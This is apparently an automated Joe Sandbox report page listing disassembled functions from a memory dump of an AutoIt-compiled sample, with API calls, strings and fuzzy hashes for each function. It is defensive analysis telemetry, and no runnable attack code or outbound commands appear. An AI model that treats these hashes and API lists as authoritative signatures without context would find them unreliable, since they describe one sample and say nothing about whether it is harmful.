Function 00AB8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d63483414d081e59d6546cd2b375e42e89baec83a549abafda086df601fe99
Instruction ID: 3c7cadd1a2e3f6b2e0a8be9cb2bf56a532fba53e2cfb6ba512fd9efb3bef63bb
Opcode Fuzzy Hash: e6d63483414d081e59d6546cd2b375e42e89baec83a549abafda086df601fe99
Instruction Fuzzy Hash: D1222530A0450ACBDF388BACC4947FD77BDFB01384F29816AE6568B593DB78AD91C641

Function 00AC21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 4fa625a34e1541ea604946c4a5567fbe16b0c061d007e41e0d54e0238185a5f8
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 62C162362051930AEB2E47398434B3EBAE19EA27B131B076DD4B3CB1D5EE24C975D760

Function 00AC25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 41f542feb562cc48d2f8537d649e7972014879c8904b7528a8db2dfa6a07de4d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 61C172322051930AEF2E47398474B3EBAE19EA37B131B076DD4B3DB1D5EE20C9659760

Function 00AC1D90 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: addf1a0e033f7a4f39635edf01d3ca1d320534f6d5946e56b839fe1bf668025d
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: CEC153323051930AEB1E47398474A3EBAE19EA37B131B076DD4B3DB1D6EE10C975D660

Function 00AC1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 74bf0d04868e4aa95127c04492bc1e7f7642aab284a5392255c456db9c7adfd7
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 26C1643230919309EF2E47398474A3EBAE19EA37B131B075DD4B3DB1D6EE20C9759650

Function 00B17806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B1785B
DeleteObject.GDI32(00000000), ref: 00B1786D
DestroyWindow.USER32 ref: 00B1787B
GetDesktopWindow.USER32 ref: 00B17895
GetWindowRect.USER32(00000000), ref: 00B1789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B179DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B179ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17A35
GetClientRect.USER32(00000000,?), ref: 00B17A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B17A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17ABB
GlobalLock.KERNEL32(00000000), ref: 00B17AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AD3
GlobalUnlock.KERNEL32(00000000), ref: 00B17ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17AE3
GlobalFree.KERNEL32(00000000), ref: 00B17AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B32CAC,00000000), ref: 00B17B16
GlobalFree.KERNEL32(00000000), ref: 00B17B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B17B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B17B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B17D7A

Strings

DISPLAY, xrefs: 00B17BDD
, xrefs: 00B17D00
static, xrefs: 00B17A75, 00B17BCC
AutoIt v3, xrefs: 00B17A2D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 91cc916d3078b78df6a208387e2764f576dd195dab1379932bca887b192d9444
Instruction ID: a02826b72707c20cb9756391813b1d74142b86f7921c28e307ea88e2fc8b5f38
Opcode Fuzzy Hash: 91cc916d3078b78df6a208387e2764f576dd195dab1379932bca887b192d9444
Instruction Fuzzy Hash: AA027C71900115EFDB24DFA4DD89EAF7BB9EF49310F5081A8F915AB2A0CB74AD41CB60

Function 00B2356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B2F910), ref: 00B23627
IsWindowVisible.USER32(?), ref: 00B2364B

Strings

ADDSTRING, xrefs: 00B23716
GETCURRENTSELECTION, xrefs: 00B237E3
FINDSTRING, xrefs: 00B23776
CHECK, xrefs: 00B2386D
UNCHECK, xrefs: 00B23883
TABRIGHT, xrefs: 00B2369D
GETSELECTED, xrefs: 00B238A3
SENDCOMMANDID, xrefs: 00B239DA
SHOWDROPDOWN, xrefs: 00B236E0
ISENABLED, xrefs: 00B2366B
SELECTSTRING, xrefs: 00B23806
TABLEFT, xrefs: 00B23687
GETCURRENTCOL, xrefs: 00B23928
GETLINECOUNT, xrefs: 00B238C6
CURRENTTAB, xrefs: 00B236BD
ISCHECKED, xrefs: 00B23839
GETCURRENTLINE, xrefs: 00B238ED
GETLINE, xrefs: 00B2399B
ISVISIBLE, xrefs: 00B23637
SETCURRENTSELECTION, xrefs: 00B237B6
HIDEDROPDOWN, xrefs: 00B23700
EDITPASTE, xrefs: 00B2395F
DELSTRING, xrefs: 00B23749

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 2ae5b23d665b042e21d34fca75cd33977a92fd785e18754f027f7e67bc8483f6
Instruction ID: 7cc7bc214570f80ea4ec7a4ad21e8ff76c43b469e4bf48228cd53b48ee1f95f0
Opcode Fuzzy Hash: 2ae5b23d665b042e21d34fca75cd33977a92fd785e18754f027f7e67bc8483f6
Instruction Fuzzy Hash: 01D18E31208311DBCB04EF10D591F6E77E5EF95780F0544A8F89A5B3A2DB29EE4ACB41

Function 00B2A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B2A630
GetSysColorBrush.USER32(0000000F), ref: 00B2A661
GetSysColor.USER32(0000000F), ref: 00B2A66D
SetBkColor.GDI32(?,000000FF), ref: 00B2A687
SelectObject.GDI32(?,00000000), ref: 00B2A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A6C1
GetSysColor.USER32(00000010), ref: 00B2A6C9
CreateSolidBrush.GDI32(00000000), ref: 00B2A6D0
FrameRect.USER32(?,?,00000000), ref: 00B2A6DF
DeleteObject.GDI32(00000000), ref: 00B2A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00B2A731
FillRect.USER32(?,?,00000000), ref: 00B2A763
GetWindowLongW.USER32(?,000000F0), ref: 00B2A78E

Part of subcall function 00B2A8CA: GetSysColor.USER32(00000012), ref: 00B2A903
Part of subcall function 00B2A8CA: SetTextColor.GDI32(?,?), ref: 00B2A907
Part of subcall function 00B2A8CA: GetSysColorBrush.USER32(0000000F), ref: 00B2A91D
Part of subcall function 00B2A8CA: GetSysColor.USER32(0000000F), ref: 00B2A928
Part of subcall function 00B2A8CA: GetSysColor.USER32(00000011), ref: 00B2A945
Part of subcall function 00B2A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2A953
Part of subcall function 00B2A8CA: SelectObject.GDI32(?,00000000), ref: 00B2A964
Part of subcall function 00B2A8CA: SetBkColor.GDI32(?,00000000), ref: 00B2A96D
Part of subcall function 00B2A8CA: SelectObject.GDI32(?,?), ref: 00B2A97A
Part of subcall function 00B2A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A999
Part of subcall function 00B2A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2A9B0
Part of subcall function 00B2A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2A9C5
Part of subcall function 00B2A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2A9ED

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 0f7d76677be4a9ef390998e515f965044b06d304746dad2424a2f6ea2ca6f3cc
Instruction ID: 19efb4a6a7d6fb116576c9e4f51d6b3df65a38ebed44d96388ab5059cc4faa21
Opcode Fuzzy Hash: 0f7d76677be4a9ef390998e515f965044b06d304746dad2424a2f6ea2ca6f3cc
Instruction Fuzzy Hash: 32916D72408312AFC7219F64DC48E6B7BF9FB88321F100B29F966971A0DB75D946CB52

Function 00AA2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00AA2CA2
DeleteObject.GDI32(00000000), ref: 00AA2CE8
DeleteObject.GDI32(00000000), ref: 00AA2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00AA2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00AA2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00ADC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ADC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ADC89D

Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A

SendMessageW.USER32(?,00001053), ref: 00ADC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ADC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADC912

Strings

0, xrefs: 00ADC731

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 1da72b923a0b98ab221836e90fdb761ac98464aa6ccc947b15921769a1f89b7d
Instruction ID: c455a7c530336814156307cb710bd9e02bff7507639e62755053b5b0ca37383b
Opcode Fuzzy Hash: 1da72b923a0b98ab221836e90fdb761ac98464aa6ccc947b15921769a1f89b7d
Instruction Fuzzy Hash: 00126E30604202EFDB25CF28C984BA9B7F5FF45320F94457AE456CB6A2CB31E952DB91

Function 00B174AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B174DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B1759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B175DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B175ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17633
GetClientRect.USER32(00000000,?), ref: 00B1763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B17692
GetStockObject.GDI32(00000011), ref: 00B176A2
SelectObject.GDI32(00000000,00000000), ref: 00B176A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B176B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B176BF
DeleteDC.GDI32(00000000), ref: 00B176C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B176F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B1770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B1775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B1776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B1779B
GetStockObject.GDI32(00000011), ref: 00B177A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B177B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B177BB

Strings

DISPLAY, xrefs: 00B17688
static, xrefs: 00B1767D, 00B17795
AutoIt v3, xrefs: 00B1762B
msctls_progress32, xrefs: 00B1773C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: abd4116906a464bf1897dd38987d0bdab479d67c0e99de8865957a16d1c7df07
Instruction ID: 748af4e6743989daa68438d9848195178cfdf0f69ff1aa8b9868f29081f8bfa4
Opcode Fuzzy Hash: abd4116906a464bf1897dd38987d0bdab479d67c0e99de8865957a16d1c7df07
Instruction Fuzzy Hash: 45A16571A40615BFEB24DBA4DD4AFAF77B9EB05710F004154FA15A72E0CB74AD11CB60

Function 00B0AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AD1E
GetDriveTypeW.KERNEL32(?,00B2FAC0,?,\\.\,00B2F910), ref: 00B0ADFB
SetErrorMode.KERNEL32(00000000,00B2FAC0,?,\\.\,00B2F910), ref: 00B0AF59

Strings

PhysicalDrive, xrefs: 00B0ADA7
RAID, xrefs: 00B0AEF7
MMC, xrefs: 00B0AF1A
RAMDisk, xrefs: 00B0AE25
SSD, xrefs: 00B0AE86
iSCSI, xrefs: 00B0AEFE
ATA, xrefs: 00B0AED4
Removable, xrefs: 00B0AE4D
SAS, xrefs: 00B0AF05
Network, xrefs: 00B0AE39
CDROM, xrefs: 00B0AE2F
1394, xrefs: 00B0AEDB
USB, xrefs: 00B0AEF0
\\.\, xrefs: 00B0AD70
SATA, xrefs: 00B0AF0C
Fibre, xrefs: 00B0AEE9
Unknown, xrefs: 00B0AE1B, 00B0AEBF
Virtual, xrefs: 00B0AF21
ATAPI, xrefs: 00B0AECD
SCSI, xrefs: 00B0AEC6
SSA, xrefs: 00B0AEE2
Fixed, xrefs: 00B0AE43
FileBackedVirtual, xrefs: 00B0AF28

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 052c85273dd11e814da89071f864ff1c43180f6803d08ad98ccf3ccb4c535ecf
Instruction ID: fbbf1dcd26ee8882c032b85a09d4b5d6e2532cec888650fbd2356771307c945f
Opcode Fuzzy Hash: 052c85273dd11e814da89071f864ff1c43180f6803d08ad98ccf3ccb4c535ecf
Instruction Fuzzy Hash: C15142B0644306ABCB10EB20C992DBE7BE5EB49701B2049E6E807F72E1DB719D45DB52

Function 00AA68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00AA6931
__wcsnicmp.LIBCMT ref: 00AA6949
__wcsnicmp.LIBCMT ref: 00AA6961
__wcsnicmp.LIBCMT ref: 00AA6979
__wcsnicmp.LIBCMT ref: 00AA6991
__wcsnicmp.LIBCMT ref: 00AA69A9
__wcsnicmp.LIBCMT ref: 00AA69C1
__wcsnicmp.LIBCMT ref: 00AA69D5
__wcsnicmp.LIBCMT ref: 00AA6A16
__wcsnicmp.LIBCMT ref: 00AA6A2A
__wcsnicmp.LIBCMT ref: 00AA6A3E
__wcsnicmp.LIBCMT ref: 00AA6A52

Strings

#comments-end, xrefs: 00AA6A38
#ce, xrefs: 00AA6A4C
#comments-start, xrefs: 00AA69BB, 00AA6A10
#include-once, xrefs: 00AA698B
#requireadmin, xrefs: 00AA695B
Unterminated group of comments, xrefs: 00ADE403
#include, xrefs: 00AA69A3
#pragma compile, xrefs: 00AA692B
Cannot parse #include, xrefs: 00ADE3F0
#notrayicon, xrefs: 00AA6943
#cs, xrefs: 00AA69CF, 00AA6A24
Bad directive syntax error, xrefs: 00ADE31A
#OnAutoItStartRegister, xrefs: 00AA6973

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 5af0909627b8fe79b1af60259fd1ffb2b3040d0985685221d3aedb5b062db8b0
Instruction ID: eafbe07725fb2077549b0b3cfcf624ff89dc76cef124c81232b81ff2efbc8774
Opcode Fuzzy Hash: 5af0909627b8fe79b1af60259fd1ffb2b3040d0985685221d3aedb5b062db8b0
Instruction Fuzzy Hash: 0781D8B1640205AADF21FB60ED43FBF37B8AF16740F084029F906AF1D6EB61D945DA51

Function 00B29A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B29AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B29B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B29BA7

Strings

0, xrefs: 00B29BE4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
